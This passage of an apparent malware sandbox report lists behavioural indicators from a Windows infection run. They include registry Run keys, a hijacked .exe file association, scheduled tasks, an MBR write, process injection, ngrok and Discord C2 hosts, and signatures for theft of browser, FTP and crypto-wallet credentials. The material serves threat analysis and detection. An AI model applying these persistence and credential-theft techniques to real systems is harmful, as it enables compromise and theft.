| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\100282~1\90B1CE~1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3495501434-311648039-2993076821-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\3582-490\dxwebsetup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\Files\m.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\Files\TROJAN~1.EXE | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.in.ngrok.io | N/A | N/A |
| N/A | 0.tcp.in.ngrok.io | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | 0.tcp.eu.ngrok.io | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\dsetup.dll | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\SETD746.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DirectX\WebSetup | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\34B6AF881B9D738561FC099B83DF3A01 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File created | C:\Windows\system32\SubDir\Client.exe | C:\Users\Admin\AppData\Local\Temp\Files\plswork.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\34B6AF881B9D738561FC099B83DF3A01 | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
| File created | C:\Windows\SysWOW64\directx\websetup\SETD736.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\SysWOW64\directx\websetup\SETD746.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\dsetup32.dll | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\SETD736.tmp | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Users\Admin\AppData\Local\Temp\Files\AA_v3.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1792 set thread context of 5036 | N/A | C:\Users\Admin\AppData\Local\Temp\Files\winn.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe |
| PID 4240 set thread context of 3504 | N/A | C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe | C:\Users\Admin\AppData\Local\Temp\100152~1\aqbjn3fl.exe |
| PID 4792 set thread context of 3120 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 4792 set thread context of 4036 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmlaunch.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpshare.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ExtExport.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ieinstal.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOBD5D~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmlaunch.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\UNINST~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\DISABL~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\setup_wm.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmplayer.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\WI8A19~1\ImagingDevices.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~2\wab.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmprph.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~4.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpconfig.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\WINDOW~4\wmpshare.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\iexplore.exe | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\INTERN~1\ielowutil.exe | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~2.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
| File opened for modification | C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE | C:\Users\Admin\AppData\Local\Temp\Files\dxwebsetup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Users\Admin\AppData\Roaming\SubDir\Client.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\Logs\DirectX.log | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\axplong.job | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\directx.sys | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\Files\m.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| File opened for modification | C:\Windows\svchost.com | C:\Windows\svchost.com | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe |
| N/A | N/A | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\322341857.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\44111D~1\axplong.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\m.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\23A089~1\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\svchost.com | N/A |
